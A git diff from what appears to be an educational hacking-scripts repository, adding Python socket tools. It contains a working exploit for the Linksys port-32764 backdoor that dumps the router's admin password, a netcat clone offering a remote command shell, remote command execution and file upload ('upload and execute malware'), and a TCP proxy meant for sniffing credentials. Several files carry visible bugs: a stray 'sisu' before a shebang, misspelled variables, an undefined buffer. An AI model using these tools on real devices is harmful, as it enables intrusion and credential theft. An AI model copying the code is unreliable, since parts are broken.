network --> python socket scripts

Network_and_802.11/README.md

@@ -20,12 +20,14 @@
 ### socket
 
 - Several scripts with Python's **socket** module:
-    * netcat
+    * A very simple netcat client
-    * cracking linksys
+    * A full netcat client and server
-    * reading socket
+    * Cracking linksys
+    * Reading socket
     * TCP Client
     * TCP Server
     * UDP Client
+    * TCP Proxy
 
 
 ### telnetlib
@@ -39,6 +41,12 @@
     * traceroute
 
 
+### paramiko
+
+- Several scripts for SSH connections:
+    * command
+    * tunneling
+
 
 ---
 

Network_and_802.11/socket/crack_linksys.py

@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+sisu#!/usr/bin/env python
 
 __author__ = "bt3"
 
@@ -7,8 +7,8 @@ import socket
 import struct
 import sys
 
-#HOST = '192.168.1.1'
+# Defining constants
-HOST = '192.168.33.1'
+HOST = '192.168.1.22'
 PORT = 32764
 
 def send_message(s, message, payload=''):
@@ -19,7 +19,7 @@ def send_message(s, message, payload=''):
 
     if len(response) != 12:
         print("Device is not a crackable Linksys router.")
-        print("Recieved invalid response: %s" % response)
+        print("Received invalid response: %s" % response)
         raise sys.exit(1)
 
     sig, ret_val, ret_len = struct.unpack('<III', response)
@@ -40,5 +40,6 @@ if __name__ == '__main__':
 
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect(( HOST, PORT ))
+
     send_message(s, 3, "wlan_mgr_enable=1")
     print send_message(s, 2, "http_password")

Network_and_802.11/socket/netcat_awesome.py

@@ -4,33 +4,204 @@ __author__ = "bt3"
 
 
 import socket
+import sys
+import getopt
+import threading
+import subprocess
 
-# Definning constants
+# Defining constants
-PORT = 12345
+LISTEN   = False
-HOSTNAME = '54.209.5.48'
+COMMAND  = False
+UPLOAD   = False
+EXECUTE  = ''
+TARGET   = ''
+UP_DEST  = ''
+PORT     = 0
 
 
-def netcat(text_to_send):
+# The option menu
+def usage():
+    print "Usage: netcat_awesome.py -t <HOST> -p <PORT>"
+    print "  -l --listen                  listen on HOST:PORT"
+    print "  -e --execute=file            execute the given file"
+    print "  -c --command                 initialize a command shell"
+    print "  -u --upload=destination      upload file and write to destination"
+    print
+    print "Examples:"
+    print "netcat_awesome.py -t localhost -p 5000 -l -c"
+    print "netcat_awesome.py -t localhost -p 5000 -l -u=example.exe"
+    print "netcat_awesome.py -t localhost -p 5000 -l -e='ls'"
+    print "echo 'AAAAAA' | ./netcat_awesome.py -t localhost -p 5000"
+    sys.exit(0)
 
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect(( HOSTNAME, PORT))
-    s.sendall(text_to_send)
-    s.shutdown(socket.SHUT_WR)
 
-    adata = []
+def client_sender(buffer):
-    while 1:
+    # set TCP socket object
-        data = s.recv(1024)
+    client = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
-        if data == "":
+
+    try:
+        client.connect(( TARGET, PORT ))
+
+        # test to see if received any data
+        if len(buffer):
+            client.send(buffer)
+
+        while True:
+            # wait for data
+            recv_len = 1
+            response = ''
+
+            while recv_len:
+                data = client.recv(4096)
+                recv_len = len(data)
+                response += data
+                if recv_len < 4096:
                     break
-        adata.append(data)
+            print response
 
-    s.close()
+            # wait for more input until there is no more data
-    return adata
+            buffer = raw_input('')
+            buffer += '\n'
 
+            # send it
+            client.send(buffer)
+
+    except:
+        print '[*] Exception. Exiting.'
+        client.close()
+
+
+
+def run_command(command):
+    command = command.rstrip()
+    print command
+    try:
+        output = subprocess.check_output(command, stderr=subprocess.STDOUT, \
+                shell=True)
+    except:
+       output = "Failed to execute command.\r\n"
+    return output
+
+
+
+def client_handler(client_socket):
+    global UPLOAD
+    global EXECUTE
+    global COMMAND
+
+    # check for upload
+    # useful for upload and execute malware, for example
+    if len(UP_DEST):
+        # read in bytes and write to destination
+        file_buf = ''
+
+        # keep reading data until no more data is available
+        while True:
+            data = client_socket.recv(1024)
+            if data:
+                file_buffer += data
+            else:
+                break
+
+        # try to write the bytes (wb for binary mode)
+        try:
+            with open(UP_DEST, 'wb') as f:
+                f.write(file_buffer)
+                client_socket.send('File saved to %s\r\n' % UP_DEST)
+        except:
+            client_socket.send('Failed to save file to %s\r\n' % UP_DEST)
+
+    # check for command execution:
+    if len(EXECUTE):
+        output = run_command(EXECUTE)
+        client_socket.send(output)
+
+    # go into a loop if a command shell was requested
+    if COMMAND:
+        while True:
+            # show a prompt:
+            client_socket.send('NETCAT: ')
+            cmd_buffer = ''
+
+            # scans for a newline character to determine when to process a command
+            # if using with a Python client, it's necessary to add this
+            while '\n' not in cmd_buffer:
+                cmd_buffer += client_socket.recv(1024)
+
+            # send back the command output
+            response = run_command(cmd_buffer)
+
+            # send back the response
+            client_socket.send(response)
+
+
+def server_loop():
+    server = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
+    server.bind(( TARGET, PORT ))
+    server.listen(5)
+
+    while True:
+        client_socket, addr = server.accept()
+        client_thread = threading.Thread( target =client_handler, \
+                args=(client_socket,))
+        client_thread.start()
+
+
+
+
+def main():
+    global LISTEN
+    global PORT
+    global EXECUTE
+    global COMMAND
+    global UP_DEST
+    global TARGET
+
+
+    if not len(sys.argv[1:]):
+        usage()
+
+    # parse the arguments
+    try:
+        opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu", \
+            ["help", "LISTEN", "EXECUTE", "TARGET", "PORT", "COMMAND", "UPLOAD"])
+    except getopt.GetoptError as err:
+        print str(err)
+        usage()
+
+
+    # Handle the options and arguments
+    for o, a in opts:
+        if o in ('-h', '--help'):
+            usage()
+        elif o in ('-l', '--listen'):
+            LISTEN = True
+        elif o in ('-e', '--execute'):
+            EXECUTE = a
+        elif o in ('-c', '--commandshell'):
+            COMMAND = True
+        elif o in ('-u', '--upload'):
+            UP_DEST = a
+        elif o in ('-t', '--target'):
+            TARGET = a
+        elif o in ('-p', '--port'):
+            PORT = int(a)
+        else:
+            assert False, "Unhandled option"
+
+
+    # NETCAT client (just sending data)
+    if not LISTEN and len(TARGET) and PORT > 0:
+        buffer = sys.stdin.read()
+        client_sender(buffer)
+
+
+    # NETCAT server
+    if LISTEN:
+        if not len(TARGET):
+            TARGET = '0.0.0.0'
+        server_loop()
 
 
 if __name__ == '__main__':
-
+    main()
-    text_to_send = ''
-    text_recved = netcat(text_to_send))
-    print text_recved[1]

Network_and_802.11/socket/netcat_simple.py

@@ -5,7 +5,7 @@ __author__ = "bt3"
 
 import socket
 
-# Definning constants
+# Defining constants
 PORT = 12345
 HOSTNAME = '54.209.5.48'
 

Network_and_802.11/socket/reading_socket.py

@@ -5,14 +5,10 @@ __author__ = "bt3"
 
 import os
 import socket
-import select
-from time import sleep
-import binascii
 from subprocess import Popen, STDOUT, PIPE
-import os
-from math import *
-import string
 
+# Defining constants
+SHELL_COMMAND = "nc 54.209.5.48 12345"
 
 
 def next_line(stdout):
@@ -32,12 +28,12 @@ def write(stdin,val):
 
 
 def nl():
-  # shorter next line for iteration
+  # next line for iteration
   return next_line(p.stdout)
 
 
 def wr(val):
-  # shorter write for iteration
+  # write for iteration
   write(p.stdin,val)
 
 
@@ -48,14 +44,11 @@ def ntext():
   return line[len("psifer text:") + 1:]
 
 
-
 def main():
-  SHELL_COMMAND = "nc 54.209.5.48 12345"
 
   p = Popen(SHELL_COMMAND, shell=True, cwd="./", stdin=PIPE,
     stdout=PIPE, stderr=STDOUT,close_fds=True)
 
-
   while True:
     text = ntext()
     text += " -> just an example"

Network_and_802.11/socket/tcp_proxy.py

@@ -0,0 +1,157 @@
+#!/usr/bin/env python
+
+__author__ = "bt3"
+
+
+import socket
+import threading
+import sys
+
+# Output the packet details with both hexadecimal and ASCII-printable
+# characters. Useful to understanding unknown protocols, finding user
+# credentials, etc.
+def hexdump(src, length=16):
+    result = []
+    digists = 4 if isinstance(src, unicode) else 2
+    for i in range(len(src), lenght):
+        s = src[i:i+length]
+        hexa = b' '.join(['%0*X' % (digits, ord(x)) for x in s])
+        text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
+        result.append(b"%04X %-*s %s" % (i, length*(digits + 1), hexa, text))
+
+# Used for receiving local and remote data, and pass in the socket object.
+def receive_from(connection):
+    buffer = ''
+
+    # set 2 second timeout
+    # mb too much if you are proxying to other countries
+    connection.settimeout(2)
+    try:
+        while True:
+            data = connection.recv(4096)
+            if not data:
+                break
+            buffer += data
+    except:
+        pass
+    return buffer
+
+def request_handler(buffer):
+    # perform packet modifications
+    buffer += ' Yaeah!'
+    return buffer
+
+def response_handler(buffer):
+    # perform packet modifications
+    return buffer
+
+
+
+def proxy_handler(client_socket, remote_host, remote_port, receive_first):
+
+    remote_socket = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
+    remote_socket.connect(( remote_host, remote_port ))
+
+    # receive data from the remote if necessary
+    if receive_first:
+        remote_buffer = receive_from(remote_socket)
+        hexdump(remote_buffer)
+
+        # send it to the response handler
+        remote_buffer = response_handler(remote_buffer)
+
+        # if we have data to send to client, send it:
+        if len(remote_buffer):
+            print "[<==] Sending %d bytes to localhost." %len(remote_buffer)
+            client_socket.send(remote_buffer)
+
+
+    # loop and read from local, send to remote, send to local
+    while True:
+
+        local_buffer = receive_from(client_socket)
+        if len(local_buffer):
+            print "[==>] Received %d bytes from localhost." % len(local_buffer)
+            hexdump(local_buffer)
+
+            # send it to our request handler
+            local_buffer = request_handler(local_buffer)
+
+            # send off the data to the remote host
+            remote_socket.send(local_buffer)
+            print "[==>] Sent to remote."
+
+
+        remote_buffer = receive_from(remote_socket)
+        if len(remote_buffer):
+            print "[==>] Received %d bytes from remote." % len(remote_buffer)
+            hexdump(remote_buffer)
+
+            # send it to our response handler
+            remote_buffer = response_handler(remote_buffer)
+
+            # send off the data to the remote host
+            client_socket.send(remote_buffer)
+            print "[==>] Sent to localhost."
+
+
+        if not len(local_buffer) or not len(remote_buffer):
+            client_socket.close()
+            remote_socket.close()
+            print "[*] No more data. Closing connections"
+            break
+
+
+
+
+
+def server_loop(local_host, local_port, remote_host, remote_port, receive_first):
+
+    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    try:
+        server.bind(( local_host, local_port))
+    except:
+        print "[!!] Failed to listen on %s:%d" % (local_host, local_port)
+        sys.exit()
+
+    print "[*] Listening on %s:%d" % (local_host, local_port)
+    server.listen(5)
+
+    while True:
+        client_socket, addr = server.accept()
+        print "[==>] Received incoming connection from %s:%d" %(addr[0], addr[1])
+
+        # start a thread to talk to the remote host
+        proxy_thread = threading.Thread(target=proxy_handler, \
+            args=(client_socket, remote_host, remote_port, receive_first))
+        proxy_thread.start()
+
+
+def main():
+
+    if len(sys.argv[1:]) != 5:
+        print "Usage: ./proxy.py <localhost> <localport> <remotehost> <remoteport> <received_first>"
+        print "Example: ./proxy.py 127.0.0.1 9000 10.12.122.1 9999 True"
+        sys.exit()
+
+    # setup local remote target
+    local_host = sys.argv[1]
+    local_port = int(sys.argv[2])
+
+    # setup remote target
+    remote_host = sys.argv[3]
+    remote_port = int(sys.argv[4])
+
+    # tells the proxy to connect and receive data
+    # before sending to the remote host
+    if sys.argv[5] == 'True':
+        receive_first = True
+    else:
+        receive_first = False
+
+    # run the listening socket
+    server_loop(local_host, local_port, remote_host, remote_port, receive_first)
+
+if __name__ == '__main__':
+    main()